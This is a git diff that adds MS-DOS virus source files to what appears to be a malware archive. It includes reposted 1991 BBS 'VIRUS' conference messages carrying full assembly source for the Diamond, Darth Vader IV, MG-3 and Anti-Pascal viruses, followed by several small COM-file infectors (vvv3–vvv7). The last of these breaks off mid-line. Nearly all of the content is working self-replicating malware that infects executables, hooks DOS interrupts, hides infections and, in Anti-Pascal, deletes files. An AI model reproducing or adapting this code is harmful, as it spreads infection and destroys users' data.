ax + pop es + pop ds +calldos: + jmp cs:[old_vector] + .radix 10 +adrtbl dw +1680,1838,1840,1842,1996,1998,2000,2002,2004,2154,2156 + dw +2158,2160,2162,2164,2166,2316,2318,2320,2322,2324,2478 + dw 2480,2482,2640 +diftbl dw +-324,-322,-156,158,-318,-316,318,156,162,316,164,-322 + dw +-162,-322,322,322,-324,-158,164,316,-324,324,-316,-164 + dw 324 +valtbl dw +3332,3076,3076,3076,3588,3588,3588,3588,3588,3844,3844 + dw +3844,3844,3844,3844,3844,2564,2564,2564,2564,2564,2820 + dw 2820,2820,2308 +xlatbl dw + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3554 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +-324,316,-164,156,-322,318,-162,158,-318,322,-158,162 + dw -316,324,-156,164 + .radix 16 +time_handler: + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + push cs + pop ds + cld + mov dx,3da + mov cx,19 + mov si,offset count + mov ax,[si] + test ah,ah + jnz make_move + mov al,ah + mov es,ax + cmp al,es:[46dh] + jnz exit_timer + mov ah,0f + int 10 + cmp al,2 + jz init_diamond + cmp al,3 + jnz exit_timer +init_diamond: + inc byte ptr [si+1] + sub bl,bl + add bh,0b8 + mov [si+2],bx + mov es,bx +wait_snow: + in al,dx + test al,8 + jz wait_snow + mov si,offset valtbl +build_diamond: + mov di,[si+adrtbl-valtbl] + movsw + loop build_diamond +exit_timer: + pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + jmp cs:[old_timer] +count_down: + dec byte ptr [si] + jmp exit_timer +make_move: + test al,al + jnz count_down + inc byte ptr [si] + mov si,offset adrtbl +make_step: + push cx + push cs + pop es + lodsw + mov bx,ax + sub ax,140 + cmp ax,0d20 + jc no_xlat + test ax,ax + mov ax,[si+diftbl-adrtbl-2] + jns test_xlat + test ax,ax + js do_xlat + jmp short no_xlat +test_xlat: + test ax,ax + js no_xlat +do_xlat: + mov di,offset xlatbl + mov cx,10 + repnz scasw + dec di + dec di + xor di,2 + mov ax,[di] + mov [si+diftbl-adrtbl-2],ax +no_xlat: + mov ax,[si-2] + add ax,[si+diftbl-adrtbl-2] + mov [si-2],ax + mov cx,19 + mov di,offset adrtbl + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3555 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +lookup: + jcxz looked_up + repnz scasw + jnz looked_up + cmp si,di + jz lookup + mov [si-2],bx + mov ax,[si+diftbl-adrtbl-2] + xchg ax,[di+diftbl-adrtbl-2] + mov [si+diftbl-adrtbl-2],ax + jmp lookup +looked_up: + mov es,[homeadr] + mov di,bx + xor bx,bx + call out_char + mov di,[si-2] + mov bx,[si+valtbl-adrtbl-2] + call out_char + pop cx + loop make_step + jmp exit_timer +out_char: + in al,dx + test al,1 + jnz out_char +check_snow: + in al,dx + test al,1 + jz check_snow + xchg ax,bx + stosw + ret +stack_offset dd ? +return_address dd ? + db '7106286813' +exe_header: int 20 +last_page: nop +top_code: + db ? +page_count dw ? + dw ? +header_size dw ? +min_size dw ? +max_size dw ? +ss_offset dw ? +sp_offset dw ? + dw ? +ip_offset dw ? +cs_offset dw ? +top_header: +file_size dd ? +old_vector dd ? +old_timer dd ? +count db ? +flag db ? +homeadr dw ? +top_data: + end + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:06) Number: 3556 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DARTH VADER Conf: (16) VIRUS +--------------------------------------------------------------------------- +;********************************************************************* +********** +;* +* +;* D A R T H V A D E R IV +* +;* +* +;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia +* +;* All Rights Reserved +* +;* +& +;* Enchanced by: Lazy Wizard +& +;* +& +;* Turbo Assembler 2.0 +& +;* +& +;********************************************************************* +********** + + + .model tiny + .code + + org 100h + +Start: + call NextLine +First3: + int 20h + int 3 +NextLine: + pop bx + push ax + xor di,di + mov es,di + mov es,es:[2Bh*4+2] + mov cx,1000h + call SearchZero + jc ReturnControl + xchg ax,si + inc si +SearchTable: + dec si + db 26h + lodsw + cmp ax,8B2Eh + jne SearchTable + db 26h + lodsb + cmp al,75h + je ReturnControl + cmp al,9Fh + jne SearchTable + mov si,es:[si] + mov cx,LastByte-Start + lea ax,[di+Handle-Start] + org $-1 + xchg ax,es:[si+80h] + sub ax,di + sub ax,cx + mov [bx+OldWrite-Start-2],ax + mov word ptr [bx+NewStart+1-Start-3],di + lea si,[bx-3] + rep movsb +ReturnControl: + pop ax + push ss + pop es + mov di,100h + lea si,[bx+First3-Start-3] + push di + movsw + movsb + ret +SearchZero: + xor ax,ax + inc di + push cx + push di + mov cx,(LastByte-Start-1)/2+1 + repe scasw + pop di + pop cx + je FoundPlace + loop SearchZero + stc +FoundPlace: + ret +Handle: + push bp + call NextHandle +NextHandle: +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:06) Number: 3557 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DARTH VADER Conf: (16) VIRUS +--------------------------------------------------------------------------- + pop bp + push es + push ax + push bx + push cx + push si + push di + test ch,ch + je Do + mov ax,1220h + int 2Fh + mov bl,es:[di] + mov ax,1216h + int 2Fh + cmp es:[di+29h],'MO' + jne Do + cmp word ptr es:[di+15h],0 + jne Do + push ds + pop es + mov di,dx + mov ax,[di] + mov [bp+First3-NextHandle],ax + mov al,[di+2] + mov [bp+First3+2-NextHandle],al + call SearchZero + jc Do + push di +NewStart: + mov si,0 + mov cx,(LastByte-Start-1)/2 + cli + rep + db 36h + movsw + sti + mov di,dx + mov al,0E9h + stosb + pop ax + sub ax,di + dec ax + dec ax + stosw +Do: + pop di + pop si + pop cx + pop bx + pop ax + pop es + pop bp +OldWrite: + jmp start + +LastByte label byte + + end Start + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3558 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- +; (C) Copyright VirusSoft Corp. Sep., 1990 +; +; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. +; virus, distributed by VirusSoft company . First version was made +; in May., 1990 . Please don't make any corections in this file ! +; +; Bulgaria, Varna +; Sep. 27, 1990 + + + + ofs = 201h + len = offset end-ofs + + call $+6 + + org ofs + +first: dw 020cdh + db 0 + + pop di + dec di + dec di + mov si,[di] + dec di + add si,di + push cs + push di + cld + movsw + movsb + xchg ax,dx + + mov ax,4b04h + int 21h + jnc residnt + + xor ax,ax + mov es,ax + mov di,ofs+3 + mov cx,len-3 + rep movsb + + les di,[6] + mov al,0eah + dec cx + repne scasb + les di,es:[di] ; Searching for the INT21 vector + sub di,-1ah-7 + + db 0eah + dw offset jump,0 ; jmp far 0000:jump + +jump: push es + pop ds + mov si,[di+3-7] ; + lodsb ; + cmp al,68h ; compare DOS Ver + mov [di+4-7],al ; Change CMP AH,CS:[????] + mov [di+2-7],0fc80h ; + mov [di-7],0fccdh ; + + push cs + pop ds + + mov [1020],di ; int 0ffh + mov [1022],es + + mov beg-1,byte ptr not3_3-beg + jb not3.3 ; CY = 0 --> DOS Ver > or = 3.30 + mov beg-1,byte ptr 0 + mov [7b4h],offset pr7b4 + mov [7b6h],cs ; 7b4 + +not3.3: mov al,0a9h ; Change attrib +cont: repne scasb + cmp es:[di],0ffd8h + jne cont + mov al,18h + stosb + + push ss + pop ds + + push ss + pop es + +residnt: xchg ax,dx + retf ; ret far + +;--------Interrupt process--------; + +i21pr: push ax + push dx + push ds + push cx + push bx +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3559 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + push es + +if4b04: cmp ax,4b04h + je rti + + xchg ax,cx + mov ah,02fh + int 0ffh + +if11_12: cmp ch,11h + je yes + cmp ch,12h + jne inffn +yes: xchg ax,cx + int 0ffh + push ax + test es:byte ptr [bx+19],0c0h + jz normal + sub es:[bx+36],len +normal: pop ax +rti: pop es + pop bx + pop cx + add sp,12 + iret + +inffn: mov ah,19h + int 0ffh + push ax + +if36: cmp ch,36h ; -free bytes + je beg_36 +if4e: cmp ch,4eh ; -find first FM + je beg_4b +if4b: cmp ch,4bh ; -exec + je beg_4b +if47: cmp ch,47h ; -directory info + jne if5b + cmp al,2 + jae begin ; it's hard-disk +if5b: cmp ch,5bh ; -create new + je beg_4b +if3c_3d: shr ch,1 ; > -open & create + cmp ch,1eh ; - + je beg_4b + + jmp rest + +beg_4b: mov ax,121ah + xchg dx,si + int 2fh + xchg ax,dx + xchg ax,si + +beg_36: mov ah,0eh ; change current drive + dec dx ; + int 0ffh ; + +begin: + push es ; save DTA address + push bx ; + sub sp,44 + mov dx,sp ; change DTA + push sp + mov ah,1ah + push ss + pop ds + int 0ffh + mov bx,dx + + push cs + pop ds + + mov ah,04eh + mov dx,offset file + mov cx,3 ; r/o , hidden + int 0ffh ; int 21h + jc lst + +next: test ss:[bx+21],byte ptr 80h + jz true +nxt: mov ah,4fh ; find next + int 0ffh + jnc next +lst: jmp last + +true: cmp ss:[bx+27],byte ptr 0fdh + ja nxt + mov [144],offset i24pr + mov [146],cs + + les ax,[4ch] ; int 13h + mov i13adr,ax + mov i13adr+2,es + jmp short $ +beg: mov [4ch],offset i13pr + mov [4eh],cs + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3560 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + ; +not3_3: push ss + pop ds + push [bx+22] ; time + + push [bx+24] ; date + + push [bx+21] ; attrib + + lea dx,[bx+30] ; ds : dx = offset file name + mov ax,4301h ; Change attrib !!! + pop cx + and cx,0feh ; clear r/o and CH + or cl,0c0h ; set Infect. attr + int 0ffh + + mov ax,03d02h ; open + int 0ffh ; int 21h + xchg ax,bx + + push cs + pop ds + + mov ah,03fh + mov cx,3 + mov dx,offset first + int 0ffh + + mov ax,04202h ; move fp to EOF + xor dx,dx + mov cx,dx + int 0ffh + mov word ptr cal_ofs+1,ax + + mov ah,040h + mov cx,len + mov dx,ofs + int 0ffh + jc not_inf + + mov ax,04200h + xor dx,dx + mov cx,dx + int 0ffh + + mov ah,040h + mov cx,3 + mov dx,offset cal_ofs + int 0ffh + +not_inf: mov ax,05701h + pop dx ; date + pop cx ; time + int 0ffh + + mov ah,03eh ; close + int 0ffh + + les ax,dword ptr i13adr + mov [4ch],ax ; int 13h + mov [4eh],es + +last: add sp,46 + pop dx + pop ds ; restore DTA + mov ah,1ah + int 0ffh + +rest: pop dx ; restore current drive + mov ah,0eh ; + int 0ffh ; + + pop es + pop bx + pop cx + pop ds + pop dx + pop ax + +i21cl: iret ; Return from INT FC + +i24pr: mov al,3 ; Critical errors + iret + +i13pr: cmp ah,3 + jne no + inc byte ptr cs:activ + dec ah +no: jmp dword ptr cs:i13adr + +pr7b4: db 2eh,0d0h,2eh + dw offset activ +; shr cs:activ,1 + jnc ex7b0 + inc ah +ex7b0: jmp dword ptr cs:[7b0h] + +;-------- + +file: db "*",32,".COM" + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3561 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + +activ: db 0 + + dw offset i21pr ; int 0fch + dw 0 + +cal_ofs: db 0e8h + +end: + dw ? ; cal_ofs + +i13adr: dw ? + dw ? + + +; The End.--- + + * Origin: ESaSS / Thunderbyte support, The Netherlands (2:280/200) + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3562 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + page ,132 + name AP400 + title The 'Anti-Pascal' virus, version AP-400 + .radix 16 + +; +...................................................................... +...... +; . Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, +ap. 51 . +; . Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +. +; . +. +; . The 'Anti-Pascal' Virus, version AP-400 +. +; . Disassembled by Vesselin Bontchev, July 1990 +. +; . +. +; . Copyright (c) Vesselin Bontchev 1989, 1990 +. +; . +. +; . This listing is only to be made available to virus +researchers . +; . or software writers on a need-to-know basis. +. +; +...................................................................... +...... + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +v_const = 2042d + +start: + jmp v_entry + db 0CA ; Virus signature + + db (2048d - 9) dup (90) ; The original "program" + + mov ax,4C00 ; Just exit + int 21 + +v_start label byte +first4 db 0E9, 0F8, 7, 90 +allcom db '*.COM', 0 + +mydta label byte +reserve db 15 dup (?) +attrib db ? +time dw ? +date dw ? +fsize dd ? +namez db 14d dup (?) + +allp db 0, '?????????A?' +maxdrv db ? +sign db 'PAD' + +v_entry: + push ax ; Save AX & DX + push dx + + mov ah,19 ; Get the default drive + int 21 + push ax ; Save it on stack + mov ah,0E ; Set it as default (?!) + mov dl,al + int 21 ; Do it + + call self ; Determine the virus' start +address +self: + pop si + sub si,offset self-v_const + +; Save the number of logical drives in the system: + + mov byte ptr [si+offset maxdrv-v_const],al + +; Restore the first 4 bytes of the infected program: + + mov ax,[si+offset first4-v_const] + mov word ptr ds:[offset start],ax + mov ax,[si+offset first4+2-v_const] + mov word ptr ds:[offset start+2],ax + + mov ah,1A ; Set new DTA + lea dx,[si+offset mydta-v_const] + int 21 ; Do it +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3563 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + pop ax ; Restore current drive in AL + push ax ; Keep it on stack + + call inf_drive ; Proceed with the current drive + + xor al,al ; For all logical drives in +the system +drv_lp: + call inf_drive ; Proceed with drive + jbe drv_lp ; Loop until no more drives + + pop ax ; Restore the saved current drive + mov ah,0E ; Set it as current drive + mov dl,al + int 21 ; Do it + + mov dx,80 ; Restore original DTA + mov ah,1A + int 21 ; Do it + + mov si,offset start + pop dx ; Restore DX & AX + pop ax + jmp si ; Run the original program + +inf_drive: + push ax ; Save the selected drive number +on stack + mov ah,0E ; Select that drive + mov dl,al + int 21 ; Do ti + pop ax ; Restore AX + + push ax ; Save the registers used + push bx + push cx + push si ; Save SI + + mov cx,1 ; Read sector #50 of the drive +specified + mov dx,50d + lea bx,[si+offset v_end-v_const] + push ax ; Save AX + push bx ; Save BX, CX & DX also + push cx + push dx + int 25 ; Do read + pop dx ; Clear the stack + pop dx ; Restore saved DX, CX & BX + pop cx + pop bx + jnc wr_drive ; Write the information back if no +error + + pop ax ; Restore AX + pop si ; Restore SI + +drv_xit: + pop cx ; Restore used registers + pop bx + pop ax + + inc al ; Go to next drive number + cmp al,[si+offset maxdrv-v_const] ; See if there +are more drives +xit: + ret ; Exit + +wr_drive: + pop ax ; Restore drive number in AL + int 26 ; Do write + pop ax ; Clear the stack + pop si ; Restore Si + jnc cont ; Continue if no error + clc + jmp drv_xit ; Otherwise exit + +; Find first COM file on the current directory of the selected drive: + +cont: + mov ah,4E + xor cx,cx ; Normal files only + lea dx,[si+offset allcom-v_const] ; File mask +next: + int 21 ; Do find + jc no_more ; Quit search if no more such files + lea dx,[si+offset namez-v_const] ; Get file name +found + call infect ; Infect that file + mov ah,4F ; Prepare for FindNext + jc next ; If infection not successful, +go to next file + jmp drv_xit ; Otherwise quit + +no_more: + mov ah,13 ; Delete all *.P* files in +that dir + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3564 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + lea dx,[si+offset allp-v_const] + int 21 ; Do it + clc + jmp drv_xit ; Done. Exit + +namaddr dw ? ; Address of the file name buffer + +infect: + mov [si+offset namaddr-v_const],dx ; Save file +name address + + mov ax,4301 ; Reset all file attributes + xor cx,cx + int 21 ; Do it + jc xit ; Exit on error + + mov ax,3D02 ; Open file for both reading and +writing + int 21 + jc xit ; Exit on arror + mov bx,ax ; Save file handle in BX + + mov cx,4 ; Read the first 4 bytes of the +file + mov ah,3F + lea di,[si+offset first4-v_const] ; Save them in +first4 + mov dx,di + int 21 ; Do it + jc quit ; Exit on error + + cmp byte ptr [di+3],0CA ; File already infected? + stc ; Set CF to indicate it + jz quit ; Don't touch this file if so + + mov cx,[si+offset fsize-v_const] + cmp cx,2048d ; Check if file size >= 2048 bytes + jb quit ; Exit if not + cmp cx,64000d ; Check if file size <= 64000 +bytes + stc ; Set CF to indicate it + ja quit ; Exit if not + + xor cx,cx ; Seek to file end + xor dx,dx + mov ax,4202 + int 21 ; Do it + push ax ; Save file size on stack + jc quit ; Exit on error + +; Write the virus body after the end of file: + + mov cx,v_end-v_start + nop + lea dx,[si+offset v_start-v_const] + mov ah,40 + int 21 ; Do it + jc quit ; Exit on error + pop ax ; Restore file size in AX + +; Form a new address for the first JMP instruction in AX: + + add ax,v_entry-v_start-3 + mov byte ptr [di],0E9 ; JMP opcode + mov [di+1],ax + mov byte ptr [di+3],0CA ; Set the "file +infected" sign + + xor cx,cx ; Seek to file beginning + xor dx,dx + mov ax,4200 + int 21 ; Do it + jc quit ; Exit on error + + mov cx,4 ; Write the new first 4 bytes +of the file + mov dx,di + mov ah,40 + int 21 ; Do it + +quit: + pushf ; Save flags + + mov ax,5701 ; Set file date & time + mov cx,[si+offset time-v_const] ; Get time from +mydta + mov dx,[si+offset date-v_const] ; Get date from +mydta + int 21 ; Do it + + mov ah,3E ; Close the file + int 21 + + mov ax,4301 ; Set file attributes + mov cl,[si+offset attrib-v_const] ; Get them +from mydta + xor ch,ch + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:08) Number: 3565 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: ANTI PASCAL Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov dx,[si+offset namaddr-v_const] ; Point to +file name + int 21 ; Do it + + popf ; Restore flags + ret + +v_end equ $ + +code ends + end start + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv3.asm b/MSDOS/Virus.MSDOS.Unknown.vvv3.asm new file mode 100644 index 00000000..9fb5cb94 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv3.asm @@ -0,0 +1,127 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin + + + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; ----- alma mater + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv4.asm b/MSDOS/Virus.MSDOS.Unknown.vvv4.asm new file mode 100644 index 00000000..82dc7200 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv4.asm @@ -0,0 +1,134 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv5.asm b/MSDOS/Virus.MSDOS.Unknown.vvv5.asm new file mode 100644 index 00000000..4ed7938b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv5.asm @@ -0,0 +1,143 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv6.asm b/MSDOS/Virus.MSDOS.Unknown.vvv6.asm new file mode 100644 index 00000000..c422af9f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv6.asm @@ -0,0 +1,147 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID + nop ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP MOVSB ; move v + + stc + + LEA DX,FFF + MOV AH,4EH + MOV CX,20H + INT 21H ; find first + + or ax,ax + jz LLL + jmp done + +LLL: + MOV AH,2FH + INT 21H ; get DTA + + mov ax,es:[bx+1ah] + mov ds:[0fch],ax ; size + add bx,1eh + mov ds:[0feh],bx ; point to name + + mov ax,'OC' ; "CO" + sub ax,ds:[009eh] + je fin ; if file name CO*.com then skip + + add ax,180h ; if new len file + len VIR + 180h > FFF0 + add ax,ds:[0fah] ; then skip this file + add ax,fso + cmp ax,0fff0h + ja fin + + clc + mov ax,3d02h + mov dx,bx + int 21h ; open file + + mov bx,ax + mov ah,3fh + mov cx,ds:[0fch] + mov dx,ds:[0f6h] + int 21h ; read file + + mov bx,dx + mov ax,[bx] + sub ax,9090h + jz fin ; if file inf. then skip this file + + mov al,'M' + mov di,dx + mov cx,ds:[0fch] + repne scasb + jne cont + mov al,'Z' + cmp es:[di],al + je fin ; if converted then skip + +cont: + MOV AX,ds:[0fch] + mov bx,ds:[0f6h] + mov [bx-2],ax ; correct old len + + mov ah,3ch + mov cx,00h + mov dx,ds:[0feh] ; point to name + clc + int 21h ; create file + + mov bx,ax ; # + mov ah,40h + mov cx,ds:[0fch] + add cx,ds:[0fah] + mov DX,ds:[0f8h] + int 21h ; write file + + + mov ah,3eh + int 21h ;close file + +FIN: + stc + mov ah,4fh + int 21h ; find next + + or ax,ax + jnz done + + JMP lll + +DONE: + + mov cx,80h + mov si,0ff7fh + mov di,0080h + rep movsb ; restore param + + MOV AX,0A4F3H + mov ds:[0fff9h],ax + mov al,0eah + mov ds:[0fffbh],al + mov ax,100h + mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100 + + lea si,begp + lea di,kkk + mov ax,cs + mov ds:[0fffeh],ax + mov kk,ax + mov cx,fso + + db 0eah + dw 0fff9h +kk dw 0000h + +fff db '*?.com',0 +fso dw 0005h ; source len file + + +begp: + MOV AX,4C00H + int 21h ; exit + +end kkk diff --git a/MSDOS/Virus.MSDOS.Unknown.vvv7.asm b/MSDOS/Virus.MSDOS.Unknown.vvv7.asm new file mode 100644 index 00000000..03c58536 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vvv7.asm @@ -0,0 +1,153 @@ +.model tiny +.code +org 100h +kkk: + nop ; ID +count db 90h ; ID + + mov cx,80h + mov si,0080h + mov di,0ff7fh + rep movsb ; save param + + lea ax,begp ; begin prog + mov cx,ax + sub ax,100h + mov ds:[0fah],ax ; len VIR + add cx,fso + mov ds:[0f8h],cx ; begin buffer W + ADD CX,AX + mov ds:[0f6h],cx ; begin buffer R + + mov cx,ax + lea si,kkk + mov di,ds:[0f8h] +RB: REP 